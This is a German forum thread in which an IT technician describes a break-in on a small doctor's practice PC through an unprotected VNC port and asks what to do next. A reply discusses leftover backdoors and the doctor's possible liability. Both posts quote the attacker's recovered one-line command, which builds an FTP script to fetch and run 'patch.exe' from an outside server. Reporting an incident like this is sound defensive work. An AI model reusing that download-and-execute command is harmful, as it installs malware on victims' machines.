Verhalten bei evtl. Datendiebstahl

23/01/2009 - 08:59 von Daniel Bölling | Report spam
Hallo,

habe einen Kunden (kleine Arztpraxis) bei dem ein anderer Hàndler nen Bock
geschossen hat.
Auf dem Router sind mehrere Portweiterleitungen eingerichtet (jetzt nicht
mehr).
U.a. wurde auf der Port 5900 auf eine xp Arbeitsstation weitergeleitet. Dort
lief WinVNC welches nicht per Passwort geschützt wurde.
Nun lief das ganze scheinbar schon mehrere Monate so ohne das etwas
(offensichtliches) passiert ist.

Als dann im Outlook Kalender etwas wie "echo you are owned" o.à. auftauchte
wurden die Damen nervös und haben den Internetzugang gekappt.

Nach Analyse der Ereignisanzeige wurde am 19.01 von 2 IP Adressen auf das
System zugegriffen.
Unter Start, Ausführen wurde folgendes Script eingegeben:
cmd /c echo open ftp.tetovaret.net 21 >> ik &echo user faraonbaba1 cufa1234


ik &echo binary >> ik &echo get patch.exe >> ik &echo bye >> ik




&ftp -n -v -s:ik &del ik &patch.exe &exit

Der Rechner wird jetzt neu installiert, vorher zieh ich nen Image vom
System.

Ich geh mal nicht davon aus das der "Hacker" die Daten vom Ärzteprogramm
entwendet hat, er hatte lt. Ereignisanzeige nur kurzen Zugriff auf das
System. Der Arzt möchte nun von mir wissen, wie er weiter vorzugehen hat.
Anzeige gegen Unbekannt? Gegen den Hàndler wegen Dummheit?

thx im voraus
Daniel
 

Lesen sie die antworten

#1 Juergen Ilse
23/01/2009 - 09:11 | Warnen spam
Hallo,

"Daniel Bölling" wrote:
Nach Analyse der Ereignisanzeige wurde am 19.01 von 2 IP Adressen auf das
System zugegriffen.
Unter Start, Ausführen wurde folgendes Script eingegeben:
cmd /c echo open ftp.tetovaret.net 21 >> ik &echo user faraonbaba1 cufa1234
>> ik &echo binary >> ik &echo get patch.exe >> ik &echo bye >> ik
&ftp -n -v -s:ik &del ik &patch.exe &exit

Der Rechner wird jetzt neu installiert, vorher zieh ich nen Image vom
System.



Sinnvoll (und notwendig).

Ich geh mal nicht davon aus das der "Hacker" die Daten vom Ärzteprogramm
entwendet hat, er hatte lt. Ereignisanzeige nur kurzen Zugriff auf das
System.



Da der Taeter die Datei "patch.exe" sicherlich nicht nur zu seiner eigenen
Belustigung heruntergeladen hat, sondern um sie auf dem System auszufuehren,
ist in keinster Weise nachzuverfolgen, welche Hintertueren durch den jetzt
noch im System vorhanden sind und wie lange *diese* dadurch evt. instal-
lierten Hintertueren genutzt wurden. Der Angreifer kann anschliessend
schon tagelang im System gestoebert habn, auch wenn der 1. Angriff (zur
Installation weiterer Schadsoftware) nur wenige Minuten dauerte ...

Der Arzt möchte nun von mir wissen, wie er weiter vorzugehen hat.
Anzeige gegen Unbekannt? Gegen den Hàndler wegen Dummheit?



Keine Ahnung. Vielleicht sollte der Arzt einen guten Anwalt hinzuziehen,
denn u.U. kann er auch selbst Aerger bekommen, weil er nicht hinreichend
sorgsam mit dn Daten umgegangen ist (besonders wenn auf dem Rechner auch
Patientendaten gelegen haben), aber IANAL ...

Tschuess,
Juergen Ilse ()
Ein Domainname (auch wenn er Teil einer Mailadresse ist) ist nur ein Name,
nicht mehr und nicht weniger ...

Ähnliche fragen